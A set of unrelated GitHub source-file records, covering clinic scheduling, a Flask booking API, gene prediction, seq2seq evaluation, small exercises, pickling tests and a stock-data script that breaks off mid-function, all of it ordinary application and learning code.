indisponíveis para agendamento.\")\r\n            return\r\n\r\n    Agendamentos.append({ \"Consulta\": ConsultaDesejada, \"Paciente\": Paciente, \"Dia\": DiaConsulta, \"Hora\": HoraConsulta })\r\n    print(\"Consulta marcada com sucesso.\")
\r\n\r\n# Cancelling appointments\r\ndef cancelamentoConsulta():\r\n    if len(Agendamentos) == 0:\r\n        print(\"Não há agendamentos para cancelar.\")\r\n        return\r\n\r\n    print(\"\\n============ Agendamentos ============\")\r\n    for i, agendamento in enumerate(Agendamentos, start=1):\r\n        print(f\"{i}. Paciente: {agendamento['Paciente']['nome']}, Telefone: {agendamento['Paciente']['telefone']}, Dia: {agendamento['Dia']}, Hora: {agendamento['Hora']}, Consulta: {agendamento['Consulta']}\")\r\n    \r\n    agendamento_numero = int(input(\"Digite o número do agendamento para cancelar: \"))\r\n    if agendamento_numero < 1 or agendamento_numero > len(Agendamentos):\r\n        print(\"Número inválido.\")\r\n        return\r\n    \r\n    agendamento = Agendamentos[agendamento_numero - 1]\r\n    print(\"\\nAgendamento selecionado:\")\r\n    print(f\"Paciente: {agendamento['Paciente']['nome']}, Telefone: {agendamento['Paciente']['telefone']}, Dia: {agendamento['Dia']}, Hora: {agendamento['Hora']}, Consulta: {agendamento['Consulta']}\")\r\n    \r\n    confirmacao = input(\"\\nDeseja cancelar a consulta? [ 1-Sim ] [ 2-Não ]: \")\r\n    if confirmacao.upper() == \"1\":\r\n        Agendamentos.pop(agendamento_numero - 1)\r\n        print(\"Consulta cancelada com sucesso.\")\r\n\r\ndef menu_principal():\r\n    while True:\r\n        print(\"\\n============ Clinica de Consultas Ágil ============\")\r\n        print(\"|                                                   |\")\r\n        print(\"|1. Cadastrar paciente;                             |\")\r\n        print(\"|2. Marcar Consulta;                                |\")\r\n        print(\"|3. Cancelar Consulta;                              |\")\r\n        print(\"|0. Sair.                                           |\")\r\n        print(\"|                                                   |\")\r\n        print(\"=====================================================\")\r\n        \r\n        opcao = input(\"Digite a opção desejada: \")\r\n\r\n        if opcao == \"1\":\r\n            CadastroPaciente()\r\n        elif opcao == \"2\":\r\n            Consultas()\r\n        elif opcao == \"3\":\r\n            cancelamentoConsulta()\r\n        elif opcao == \"0\":\r\n            break\r\n        else:\r\n            print(\"Opção inválida. Por favor, escolha uma opção válida.\")\r\n\r\n# Call the main menu function to start the program\r\nmenu_principal()\r\n\r\n# Close the database connection when leaving the program\r\nconn.close()\r\n\r\nprint(\"Obrigado por usar a Clínica de Consultas Ágil. Até logo!\")\r\n","repo_name":"evellynamelia/Desafio-Aceleradora-Agil","sub_path":"Desafio Clínica de Consultas Ágil/Clinica com MySql.py","file_name":"Clinica com MySql.py","file_ext":"py","file_size_in_byte":6021,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"25640909160","text":"# -*-coding:utf-8-*-\n\nfrom . import api\nfrom ihome.util.commens import login_required\nfrom flask import request, g, jsonify, current_app\nfrom ihome.response_code import RET\nfrom datetime import datetime\nfrom ihome.models import Order, House\nfrom ihome import db, redis_store\n\n\n@api.route('/orders', methods=['POST'])\n@login_required\ndef save_orders():\n    # Get the request data\n    user_id = g.user_id\n    req_dict = request.get_json()\n    print(req_dict)\n    house_id = req_dict.get('house_id')\n    start_date_str = req_dict.get('start_date')\n    end_date_str = req_dict.get('end_date')\n\n    # Validate the data\n    # Completeness\n    if not all([house_id, start_date_str, end_date_str]):\n        return jsonify(errno=RET.PARAMERR, errmsg=u'数据不完整')\n\n    # Validate the date format\n    try:\n        start_date = datetime.strptime(start_date_str, '%Y-%m-%d')\n        end_date = datetime.strptime(end_date_str, '%Y-%m-%d')\n\n        assert start_date <= end_date\n\n        # Compute the number of days of the stay\n        days = (end_date-start_date).days + 1\n    except Exception as e:\n        current_app.logger.error(e)\n        return jsonify(errno=RET.PARAMERR, errmsg=u'时间格式错误')\n\n    # Validate the house\n    try:\n        house = House.query.get(house_id)\n    except Exception as e:\n        current_app.logger.error(e)\n        return jsonify(errno=RET.DBERR, errmsg=u'房屋信息查询失败')\n\n    if house is None:\n        return jsonify(errno=RET.NODATA, errmsg=u'房屋不存在')\n\n    # Check for conflicting bookings\n    try:\n        order_count = Order.query.filter(start_date < Order.end_date, end_date > Order.begin_date).count()\n    except Exception as e:\n        current_app.logger.error(e)\n        return jsonify(errno=RET.DBERR, errmsg=u'入住时间校验出错')\n\n    if order_count > 0:\n        return jsonify(errno=RET.DATAEXIST, errmsg=u'订单冲突')\n
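\n    # NOTE (added for clarity): two date ranges overlap exactly when each one\n    # starts before the other ends, i.e. start_date < Order.end_date and\n    # end_date > Order.begin_date -- the predicate used in the query above.\n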
\n    # The landlord may not book his own house\n    if house.user_id == user_id:\n        return jsonify(errno=RET.ROLEERR, errmsg=u'房主不允许下单')\n\n    # Business logic: save the order\n    order = Order()\n    order.user_id = user_id\n    order.house_id = house_id\n    order.begin_date = start_date\n    order.end_date = end_date\n    order.days = days\n    order.house_price = house.price\n    order.amount = days * house.price\n\n    try:\n        db.session.add(order)\n        db.session.commit()\n    except Exception as e:\n        current_app.logger.error(e)\n        return jsonify(errno=RET.DBERR, errmsg=u'订单保存失败')\n\n    # Return the response\n    return jsonify(errno=RET.OK, errmsg=u'下单成功')\n\n\n# /api/v1.0/orders?role=landlord  role=custom\n@api.route('/orders', methods=['GET'])\n@login_required\ndef get_orders():\n    user_id = g.user_id\n    role = request.args.get('role', '')\n\n    try:\n        if role == 'landlord':\n            houses = House.query.filter(House.user_id==user_id).all()\n            house_ids = [house.id for house in houses]\n            orders = Order.query.filter(Order.house_id.in_(house_ids)).all()\n        else:\n            orders = Order.query.filter_by(user_id=user_id).all()\n    except Exception as e:\n        current_app.logger.error(e)\n        return jsonify(errno=RET.DBERR, errmsg=u'查询订单错误')\n\n    orders_li = []\n    if orders:\n        for order in orders:\n            orders_li.append(order.to_dict())\n\n    return jsonify(errno=RET.OK, errmsg=u'查询成功', data=orders_li)\n\n\n@api.route('/order/<int:order_id>/status', methods=['PUT'])\n@login_required\ndef accept_reject_order(order_id):\n    # Get the parameters\n    user_id = g.user_id\n    req_dict = request.get_json()\n    if not req_dict:\n        return jsonify(errno=RET.PARAMERR, errmsg=u'无效参数')\n\n    action = req_dict.get('action')\n\n    # Validate the parameters\n    if action not in ('accept', 'reject'):\n        return jsonify(errno=RET.PARAMERR, errmsg=u'参数错误')\n\n    try:\n        order = Order.query.filter(Order.id==order_id, Order.status=='WAIT_ACCEPT').first()\n    except Exception as e:\n        current_app.logger.error(e)\n        return jsonify(errno=RET.DBERR, errmsg=u'查询订单错误')\n\n    if order is None:\n        return jsonify(errno=RET.NODATA, errmsg=u'订单不存在')\n\n    house = order.house\n\n    if house.user_id != user_id:\n        return jsonify(errno=RET.ROLEERR, errmsg=u'不允许修改他人的订单')\n\n    # Business logic: update the order status / attach a reason as needed\n    if action == 'accept':\n        order.status = 'WAIT_PAYMENT'\n    else:\n        order.status = 'REJECTED'\n        reason = req_dict.get('reason')\n        if not reason:\n            return jsonify(errno=RET.PARAMERR, errmsg=u'拒单原因缺失')\n        order.comment = reason\n\n    try:\n        db.session.add(order)\n        db.session.commit()\n    except Exception as e:\n        db.session.rollback()\n        current_app.logger.error(e)\n        return jsonify(errno=RET.DBERR, errmsg=u'订单修改失败')\n\n    # Return the response\n    return jsonify(errno=RET.OK, errmsg=u'订单修改成功!')\n\n\n@api.route('/order/<int:order_id>/comment', methods=['PUT'])\n@login_required\ndef update_comment(order_id):\n    # Receive the data\n    user_id = g.user_id\n    req_dict = request.get_json()\n    comment = req_dict.get('comment')\n\n    # Validate the data\n    if not comment:\n        return jsonify(errno=RET.PARAMERR, errmsg=u'参数错误')\n\n    try:\n        order = Order.query.filter(Order.id==order_id, Order.user_id==user_id,\n                                   Order.status=='WAIT_COMMENT').first()\n    except Exception as e:\n        current_app.logger.error(e)\n        return jsonify(errno=RET.DBERR, errmsg=u'查询订单错误')\n\n    if not order:\n        return jsonify(errno=RET.NODATA, errmsg=u'订单不存在')\n\n    if user_id != order.user_id:\n        return jsonify(errno=RET.ROLEERR, errmsg=u'不能评价他人订单')\n\n    # Business logic: save the comment\n    order.comment = comment\n    order.status = 'COMPLETE'\n    order.house.order_count += 1\n\n    try:\n        db.session.add(order)\n        db.session.add(order.house)\n        db.session.commit()\n    except Exception as e:\n        current_app.logger.error(e)\n        db.session.rollback()\n        return jsonify(errno=RET.DBERR, errmsg=u'添加评论失败')\n\n    # Invalidate the cached house data\n    try:\n        redis_store.delete('house_info_%s' % order.house.id)\n    except Exception as e:\n        current_app.logger.error(e)\n\n    # Return the response\n    return jsonify(errno=RET.OK, errmsg=u'评论添加成功')","repo_name":"shenxuexin/flask_ihome","sub_path":"ihome/api_1_0/orders.py","file_name":"orders.py","file_ext":"py","file_size_in_byte":6357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"11241600092","text":"\"\"\"Predict genes in a complete genome from start/stop codons and Shine-Dalgarno motifs.\"\"\"\n\n#!/bin/env python3\n# -*- coding: utf-8 -*-\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU 
General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n# A copy of the GNU General Public License is available at\n# http://www.gnu.org/licenses/gpl-3.0.html\n\n# ===============\n# IMPORT *\n# ===============\n# [A]\nimport argparse\n# [C]\nimport csv\n# [O]\nimport os\n# [R]\nimport re\n# [S]\nimport sys\n\n# [T]\nfrom tqdm import tqdm\n\n\n__author__ = \"ROUAUD Lucas\"\n__credits__ = __author__\n__version__ = \"1.0.0\"\n__maintainer__ = __author__\n__email__ = \"lucas.rouaud@gmail.com\"\n__status__ = \"Developpement\"\n\n\ndef isfile(path):\n \"\"\"Check if path is an existing file.\n :Parameters:\n path: Path to the file\n \"\"\"\n if not os.path.isfile(path):\n if os.path.isdir(path):\n msg = f\"{path} is a directory\"\n else:\n msg = f\"{path} does not exist.\"\n raise argparse.ArgumentTypeError(msg)\n return path\n\n\ndef isdir(path):\n \"\"\"Check if path is an existing file.\n :Parameters:\n path: Path to the file\n \"\"\"\n if not os.path.isdir(path):\n if os.path.isfile(path):\n msg = f\"{path} is a file\"\n else:\n msg = f\"{path} does not exist.\"\n raise argparse.ArgumentTypeError(msg)\n return path\n\n\ndef get_arguments():\n \"\"\"Retrieves the arguments of the program.\n Returns: An object that contains the arguments\n \"\"\"\n # Parsing arguments\n parser = argparse.ArgumentParser(description=__doc__,\n usage=f\"{sys.argv[0]} -h\")\n parser.add_argument(\"-i\", dest=\"genome_file\", type=isfile, required=True,\n help=\"Complete genome file in fasta format\")\n parser.add_argument(\"-g\", dest=\"min_gene_len\", type=int,\n default=50, help=\"Minimum gene length to consider\")\n parser.add_argument(\"-s\", dest=\"max_shine_dalgarno_distance\", type=int,\n default=16, help=\"Maximum distance from start codon \"\n \"where to look for a Shine-Dalgarno motif\")\n parser.add_argument(\"-d\", dest=\"min_gap\", type=int, default=40,\n help=(\"Minimum gap between two genes (shine box not \"\n \"included).\"))\n parser.add_argument(\"-p\", dest=\"predicted_genes_file\", type=str,\n default=os.curdir + os.sep + \"predict_genes.csv\",\n help=\"Tabular file giving position of predicted genes\")\n parser.add_argument(\"-o\", dest=\"fasta_file\", type=str,\n default=os.curdir + os.sep + \"genes.fna\",\n help=\"Fasta file giving sequence of predicted genes\")\n\n return vars(parser.parse_args())\n\n\ndef read_fasta(fasta_file):\n \"\"\"Extract the complete genome sequence as a single string.\n \"\"\"\n with open(fasta_file, \"rt\", encoding=\"utf-8\") as file:\n seq: str = \"\"\n\n for line in file:\n if line[0] == \">\":\n continue\n\n seq += line.strip()\n\n return seq.upper()\n\n\ndef find_start(start_regex, sequence, start, stop):\n \"\"\"Find the start codon.\n \"\"\"\n result = start_regex.search(sequence, start, stop)\n\n if result is not None:\n return result.start(0)\n else:\n return None\n\n\ndef find_stop(stop_regex, sequence, start):\n \"\"\"Find the stop codon.\n \"\"\"\n result = stop_regex.finditer(sequence, start)\n\n for codon in result:\n if (codon.start(0) - start) % 3 == 0:\n return codon.start(0)\n\n return None\n\n\ndef has_shine_dalgarno(shine_regex, sequence, start,\n max_shine_dalgarno_distance):\n \"\"\"Find a shine dalgarno motif 
before the start codon.\n    \"\"\"\n    # Only search the window just upstream of the start codon: from\n    # max_shine_dalgarno_distance bases before the start up to 6 bases before it.\n    window_start = max(0, start - max_shine_dalgarno_distance)\n    window_end = max(0, start - 6)\n    result = shine_regex.search(sequence, window_start, window_end)\n    return result is not None\n\n\ndef predict_genes(sequence, start_regex, stop_regex, shine_regex,\n                  min_gene_len, max_shine_dalgarno_distance, min_gap):\n    \"\"\"Predict most probable genes.\n    \"\"\"\n    length = len(sequence)\n    gene_list = []\n\n    desc = \"PARSING SEQUENCE\"\n\n    for i in tqdm(range(length), desc=desc):\n        if i + 4 >= length:\n            break\n\n        codon = sequence[i:(i + 3)]\n\n        start_pos = find_start(start_regex, codon, 0, 3)\n        if start_pos is None:\n            continue\n\n        gene_begin = start_pos + i\n\n        stop_pos = find_stop(stop_regex, sequence, gene_begin)\n        if stop_pos is None:\n            continue\n\n        gene_end = stop_pos + 3\n\n        if not has_shine_dalgarno(shine_regex, sequence, gene_begin,\n                                  max_shine_dalgarno_distance):\n            continue\n\n        if gene_end - gene_begin + 1 <= min_gene_len:\n            continue\n\n        # Enforce the minimum gap between the end of the previous predicted\n        # gene (1-based) and the start of the current candidate (0-based)\n        if gene_list and gene_begin - gene_list[-1][1] < min_gap:\n            continue\n\n        gene_list.append([gene_begin + 1, gene_end])\n\n    return gene_list\n
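\n\n# NOTE (added, illustrative): with min_gap = 40, a previous gene ending at\n# 1-based position 500 and a candidate starting at 0-based position 539 gives\n# a gap of 39 (< 40), so the candidate is skipped by the check above.\n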
\ndef write_genes_pos(predicted_genes_file, probable_genes):\n    \"\"\"Write list of gene positions.\n    \"\"\"\n    try:\n        with open(predicted_genes_file, \"wt\", encoding=\"utf-8\") as pred_g:\n            predict_genes_writer = csv.writer(pred_g, delimiter=\",\")\n            predict_genes_writer.writerow([\"Start\", \"Stop\"])\n            predict_genes_writer.writerows(probable_genes)\n    except IOError:\n        sys.exit(f\"Error cannot open {predicted_genes_file}\")\n\n\ndef fill(text, width=80):\n    \"\"\"Split text with a line return to respect fasta format\"\"\"\n    return os.linesep.join(text[i:i+width] for i in range(0, len(text), width))\n\n\ndef write_genes(fasta_file, sequence, probable_genes, sequence_rc,\n                probable_genes_comp):\n    \"\"\"Write gene sequence in fasta format.\n    \"\"\"\n    try:\n        with open(fasta_file, \"wt\", encoding=\"utf-8\") as fasta:\n            for i, gene_pos in enumerate(probable_genes):\n                fasta.write(f\">gene_{i + 1}{os.linesep}\"\n                            f\"{fill(sequence[gene_pos[0]-1:gene_pos[1]])}{os.linesep}\")\n\n            # Numbering of the reverse-complement genes continues after the\n            # forward-strand genes\n            offset = len(probable_genes)\n\n            for j, gene_pos in enumerate(probable_genes_comp):\n                fasta.write(f\">gene_{offset + 1 + j}{os.linesep}\"\n                            f\"{fill(sequence_rc[gene_pos[0]-1:gene_pos[1]])}{os.linesep}\")\n    except IOError:\n        sys.exit(f\"Error cannot open {fasta_file}\")\n\n\ndef reverse_complement(kmer):\n    \"\"\"Get the reverse complement.\n    \"\"\"\n    complement = {\"A\": \"T\", \"C\": \"G\", \"G\": \"C\", \"T\": \"A\"}\n    return \"\".join([complement[base] for base in kmer[::-1]])\n\n\nif __name__ == \"__main__\":\n    m_start_regex = re.compile(\"AT[TG]|[ATCG]TG\")\n    m_stop_regex = re.compile(\"TA[GA]|TGA\")\n    m_shine_regex = re.compile(\"A?G?GAGG|GGAG|GG.{1}GG\")\n\n    arg = get_arguments()\n\n    m_sequence = read_fasta(arg[\"genome_file\"])\n    m_reverse = reverse_complement(m_sequence)\n\n    m_genes = predict_genes(\n        sequence=m_sequence,\n        start_regex=m_start_regex,\n        stop_regex=m_stop_regex,\n        shine_regex=m_shine_regex,\n        min_gene_len=arg[\"min_gene_len\"],\n        max_shine_dalgarno_distance=arg[\"max_shine_dalgarno_distance\"],\n        min_gap=arg[\"min_gap\"],\n    )\n\n    m_genes_reverse = predict_genes(\n        sequence=m_reverse,\n        start_regex=m_start_regex,\n        stop_regex=m_stop_regex,\n        shine_regex=m_shine_regex,\n        min_gene_len=arg[\"min_gene_len\"],\n        max_shine_dalgarno_distance=arg[\"max_shine_dalgarno_distance\"],\n        min_gap=arg[\"min_gap\"],\n    )\n\n    write_genes(\n        fasta_file=arg[\"fasta_file\"],\n        sequence=m_sequence,\n        probable_genes=m_genes,\n        sequence_rc=m_reverse,\n        probable_genes_comp=m_genes_reverse\n    )\n\n    write_genes_pos(\n        predicted_genes_file=arg[\"predicted_genes_file\"],\n        probable_genes=m_genes\n    )\n","repo_name":"FilouPlains/TMP_GPRED","sub_path":"gpred/gpred.py","file_name":"gpred.py","file_ext":"py","file_size_in_byte":8418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"5549933959","text":"# -*- coding: utf-8 -*-\nimport torch\nfrom torch.autograd import Variable\n\nimport random\n\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as ticker\nimport numpy as np\n\nfrom datatools import MAX_LENGTH, USE_CUDA\nfrom datatools import SOS_token, EOS_token\nfrom datatools import variableFromSentence\nfrom datatools import prepareData\n\n\ndef evaluate(encoder, decoder, input_lang, output_lang, sentence,\n             max_length=MAX_LENGTH):\n    \"\"\"\n    Translate an input sentence and return the decoder's attention.\n    :param encoder:\n    :param decoder:\n    :param input_lang: object(Lang), the source language\n    :param output_lang: object(Lang), the target language\n    :param sentence:\n    :param max_length: maximum length of the input sentence\n    :return:\n    \"\"\"\n    # encode the sentence\n    input_variable = variableFromSentence(input_lang, sentence)\n    encoder_hidden = encoder.initHidden()\n    input_length = input_variable.size()[0]\n\n    # set a Variable, [max_length, hidden_size]\n    encoder_outputs = Variable(torch.zeros(max_length, encoder.hidden_size))\n    encoder_outputs = encoder_outputs.cuda() if USE_CUDA else encoder_outputs\n\n    for ei in range(input_length):\n        encoder_output, encoder_hidden = encoder(input_variable[ei], encoder_hidden)\n        encoder_outputs[ei] = encoder_outputs[ei] + encoder_output[0][0]\n\n    # decode the sentence\n    decoder_input = Variable(torch.LongTensor([[SOS_token]]))\n    decoder_input = decoder_input.cuda() if USE_CUDA else decoder_input\n\n    # use the encoder's final hidden state as the decoder's initial hidden state\n    decoder_hidden = encoder_hidden\n\n    # record the decoded sentence and the decoder attentions\n    decoded_words = []\n    decoded_attentions = torch.zeros(max_length, max_length)\n\n    for di in range(max_length):\n        decoder_output, decoder_hidden, decoder_attention = decoder(\n            decoder_input, decoder_hidden, encoder_outputs)\n\n        decoded_attentions[di] = decoder_attention.data\n        topv, topi = decoder_output.data.topk(1)\n        ni = topi[0][0]\n        if ni == EOS_token:\n            decoded_words.append('<EOS>')\n            break\n        else:\n            decoded_words.append(output_lang.index2word[ni])\n\n        # feed the current output in as the next input\n        decoder_input = Variable(torch.LongTensor([[ni]]))\n        decoder_input = decoder_input.cuda() if USE_CUDA else decoder_input\n\n    return decoded_words, decoded_attentions[: di + 1]\n\n\ndef evaluateRandomly(encoder, decoder, input_lang, output_lang, pairs, n=10):\n    for i in range(n):\n        pair = random.choice(pairs)\n        print('source sentence: ', pair[0])\n        print(\"target sentence: \", pair[1])\n        output_words, attentions = evaluate(encoder, decoder, input_lang, output_lang,\n                                            pair[0])\n        output_sentence = ' '.join(output_words)\n        print(\"predicted sentence: \", output_sentence)\n        print(\"\")\n\n\ndef showAttention(input_sentence, output_words, attentions):\n    \"\"\"show attention\"\"\"\n    # set up figure with colorbar\n    fig = plt.figure()\n    ax = fig.add_subplot(111)\n    cax = ax.matshow(attentions.numpy(), cmap='bone')\n    fig.colorbar(cax)\n\n    # set up axes\n    ax.set_xticklabels([''] + input_sentence.split(' ') + ['<EOS>'], rotation=90)\n    ax.set_yticklabels([''] + output_words)\n\n    # show label at every tick\n
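    # NOTE (added for clarity): MultipleLocator(1) places one tick per integer\n    # index, so every word label lines up with one row/column of the attention\n    # matrix.\n    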
ax.xaxis.set_major_locator(ticker.MultipleLocator(1))\n ax.yaxis.set_major_locator(ticker.MultipleLocator(1))\n\n plt.show()\n\n\ndef evaluateAndShowAttention(output_words, attentions, input_sentence):\n print(\"input sentence: \", input_sentence)\n print(\"output = \", ' '.join(output_words))\n showAttention(input_sentence, output_words, attentions)\n\n\nif __name__ == \"__main__\":\n # load data\n input_lang, output_lang, pairs = prepareData('eng', 'fra', True)\n # load trained model\n print(\"loading the model.......\")\n encoder = torch.load(\"./models/encoder.pkl\")\n decoder = torch.load(\"./models/decoder.pkl\")\n # evaluate\n print(\"evaluating sentences........\")\n evaluate_sentences = [\n \"je suis trop froid .\",\n \"elle a cinq ans de moins que moi .\",\n \"elle est trop petit .\",\n \"je ne crains pas de mourir .\",\n \"c est un jeune directeur plein de talent .\"]\n for sent in evaluate_sentences:\n output_words, attentions = evaluate(encoder, decoder, input_lang, output_lang, sent)\n evaluateAndShowAttention(output_words, attentions, sent)\n\n\n\n\n\n\n\n","repo_name":"yyHaker/pytorch_study","sub_path":"src/learn/commonmodels/seq2seq_translation/evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":4523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34814992763","text":"from goals import *\nfrom models import *\nimport random\n\navailable_sounds = set([\n \"dog\",\n \"cat\",\n \"horse\",\n \"cow\",\n \"bird\",\n \"cricket\"\n])\n\nrandom_sound_words = set([\n \"random\",\n \"any\",\n \"a\",\n \"animal\",\n])\n\nclass PlaySoundActionGoal(ActionGoal):\n \"\"\"Goal for adding a play sound action\"\"\"\n def __init__(self, context, sound=None):\n super().__init__(context)\n self.setattr(\"sound\", sound)\n\n def complete(self):\n assert hasattr(self, \"actions\")\n self.actions.append(PlaySoundAction(self.sound))\n return super().complete()\n\n def setattr(self, attr, value):\n if attr == \"sound\":\n if value is None:\n self.todos.append(GetInputGoal(self.context, self, attr, \"What sound do you want me to play?\"))\n else:\n if value in random_sound_words:\n sound = random.choice(list(available_sounds))\n else:\n sound = value.replace(\"sound\", \"\").replace(\"the\", \"\").strip()\n if sound not in available_sounds:\n self.error = f\"I cannot play the {value} sound. 
I might not have this sound file.\"\n                else:\n                    self.sound = sound\n            return\n        setattr(self, attr, value)\n","repo_name":"jessvb/convo","sub_path":"backend/server/goals/sound.py","file_name":"sound.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"21450836045","text":"class Solution(object):\n    def distinctEchoSubstrings(self, text):\n        \"\"\"\n        T:O(n^2) S:O(n)\n        Runtime: 2112 ms, faster than 83.08% of Python online submissions for Distinct Echo Substrings.\n        Memory Usage: 14.6 MB, less than 100.00% of Python online submissions for Distinct Echo Substrings.\n        :type text: str\n        :rtype: int\n        \"\"\"\n        ans = set()\n        for i in range(len(text)-1):\n            start = i+1\n            end = start + (start - i)\n            while end <= len(text):\n                if text[i:start] == text[start:end]:\n                    ans.add(text[i:start])\n                start += 1\n                end = start + (start -i)\n\n        return len(ans)\n\nprint(Solution().distinctEchoSubstrings(\"abcabcabc\"))","repo_name":"jerrt2003/leetcode-in-python","sub_path":"1316_Distinct_Echo_Substrings/btterBrutalForce.py","file_name":"btterBrutalForce.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18269082476","text":"import math\r\n\r\n\r\ndef prime(n):\r\n    if n < 2:\r\n        return False\r\n    if n == 2:\r\n        return True\r\n    if n % 2 == 0:\r\n        return False\r\n    for i in range(3, int(math.sqrt(n)) + 1, 2):\r\n        if n % i == 0:\r\n            return False\r\n    return True\r\n\r\ndef add(n):\r\n    ans = n\r\n    n //= 10\r\n    while n > 0:\r\n        ans = ans * 10 + (n % 10)\r\n        n //= 10\r\n    return ans\r\n\r\n\r\nn = int(input())\r\nn = add(n)\r\nif prime(n) == True:\r\n    print(\"prime\")\r\nelse:\r\n    print(\"noprime\")","repo_name":"shixiaoliuya/Data_Structure_And_Algorithm","sub_path":"data_structure_and_algorithm/素数回文.py","file_name":"素数回文.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3010318515","text":"import os\nimport sys\nimport _setup_test_env # noqa\n\nfrom io import BytesIO\nfrom returnn.util.task_system import *\nimport inspect\nfrom nose.tools import assert_equal, assert_is_instance\nfrom returnn.util import better_exchook\n\nbetter_exchook.replace_traceback_format_tb()\n\n\ndef pickle_dumps(obj):\n  sio = BytesIO()\n  p = Pickler(sio)\n  p.dump(obj)\n  return sio.getvalue()\n\n\ndef pickle_loads(s):\n  p = Unpickler(BytesIO(s))\n  return p.load()\n\n\ndef test_pickle_anon_new_class():\n  # New style class, defined here in this scope, so that we cannot find it in any module.\n  class Foo(object):\n    a = \"class\"\n    b = \"foo\"\n\n    def __init__(self):\n      self.a = \"hello\"\n\n    def f(self, a):\n      return a\n\n  s = pickle_dumps(Foo)\n  Foo2 = pickle_loads(s)\n  assert inspect.isclass(Foo2)\n  assert Foo is not Foo2 # We get a new class.\n  assert Foo2.a == \"class\"\n  assert Foo2.b == \"foo\"\n\n  inst = Foo2()\n  assert inst.a == \"hello\"\n  assert inst.b == \"foo\"\n  assert inst.f(42) == 42\n\n\ndef test_pickle_anon_old_class():\n  # Old style class, defined here in this scope, so that we cannot find it in any module.\n  class Foo:\n    a = \"class\"\n    b = \"foo\"\n\n    def __init__(self):\n      self.a = \"hello\"\n\n    def f(self, a):\n      return a\n\n  s = pickle_dumps(Foo)\n  Foo2 = pickle_loads(s)\n  assert inspect.isclass(Foo2)\n  assert Foo is not Foo2 # We get a new class.\n  assert Foo2.a == \"class\"\n  assert Foo2.b == \"foo\"\n\n  inst = Foo2()\n  assert inst.a == 
\"hello\"\n  assert inst.b == \"foo\"\n  assert inst.f(42) == 42\n\n\ndef test_pickle_inst_anon_class():\n  class Foo(object):\n    a = \"class\"\n    b = \"foo\"\n\n    def __init__(self):\n      self.a = \"hello\"\n\n    def f(self, a):\n      return a\n\n  s = pickle_dumps(Foo())\n  inst = pickle_loads(s)\n  assert inst.a == \"hello\"\n  assert inst.b == \"foo\"\n  assert inst.f(42) == 42\n\n\nclass DemoClass:\n  def method(self):\n    return 42\n\n\ndef test_pickle():\n  obj = DemoClass()\n  s = pickle_dumps(obj.method)\n  inst = pickle_loads(s)\n  assert_equal(inst(), 42)\n","repo_name":"rwth-i6/returnn","sub_path":"tests/test_TaskSystem.py","file_name":"test_TaskSystem.py","file_ext":"py","file_size_in_byte":2156,"program_lang":"python","lang":"en","doc_type":"code","stars":345,"dataset":"github-code","pt":"53"} +{"seq_id":"36422273138","text":"\"\"\"\nExam average calculation\n\nWorking with arithmetic, logical and comparison operators\n\nThe system receives 3 grades and computes the arithmetic mean of those grades\n\nIf the average is below 5, the system shows a message that the student FAILED\nIf the average is at least 5 and below 7, the system shows a message that the student needs a make-up exam\nIf the average is above 7, the system shows a message that the student PASSED\n\nLine 27 can also be written this way: # elif media >= 5 and media < 7:\n\nAnd on line 31 the if can be changed to else: with the body moved to the next line\n\n\"\"\"\n\nif __name__ == \"__main__\":\n    nota_1 = float(input(\"Enter the first grade: \"))\n    nota_2 = float(input(\"Enter the second grade: \"))\n    nota_3 = float(input(\"Enter the third grade: \"))\n\n    media = (nota_1+nota_2+nota_3) / 3\n\n    print(f\"The overall average is: {media:.2f}\")\n\n    if media < 5:\n        print('student FAILED')\n    elif 5 <= media < 7:\n        print('student needs a make-up exam')\n    if media > 7:\n        print('student PASSED')","repo_name":"mafixx/pythonProject","sub_path":"003.py","file_name":"003.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22864035679","text":"import json\r\nimport numpy as np\r\nimport urllib.request\r\nimport requests\r\n\r\n\r\nAPIKEY=\"\"\r\nurl=\"https://www.quandl.com/api/v3/datasets/FSE/AFX_X.json?start_date=2017-01-01&end_date=2017-12-31&api_key=\"+APIKEY\r\njsonOutput=requests.get(url).json()\r\ndataset= jsonOutput['dataset']['data']\r\n\r\nstock_date = [elem[0] for elem in dataset if elem[0] != None]\r\nstock_open = [elem[1] for elem in dataset if elem[1] != None]\r\nstock_high = [elem[2] for elem in dataset if elem[2] != None]\r\nstock_low = [elem[3] for elem in dataset if elem[3] != None]\r\nstock_close = [elem[4] for elem in dataset if elem[4] != None]\r\nstock_vol = [elem[6] for elem in dataset if elem[6] != None]\r\nstock_turn = [elem[7] for elem in dataset if elem[7] != None]\r\n\r\ndef get_max_val(array):\r\n    '''\r\n    :param float or int array:\r\n    :return: int\r\n    '''\r\n    max_val = array[0]\r\n    for num in array:\r\n        if num > max_val:\r\n            max_val = num\r\n    return max_val\r\n\r\ndef get_min_val(array):\r\n    '''\r\n    :param array:float or int\r\n    :return: int\r\n    '''\r\n    min_val = array[0]\r\n    for num in array:\r\n        if num < min_val:\r\n            min_val = num\r\n    return min_val\r\n\r\ndef largest_change_one_day(s_low, s_high):\r\n    '''\r\n    :param s_low: float or int\r\n    :param s_high: float or int\r\n    :return: float or int\r\n    '''\r\n    delta = [high - low for low, high in zip(s_low, 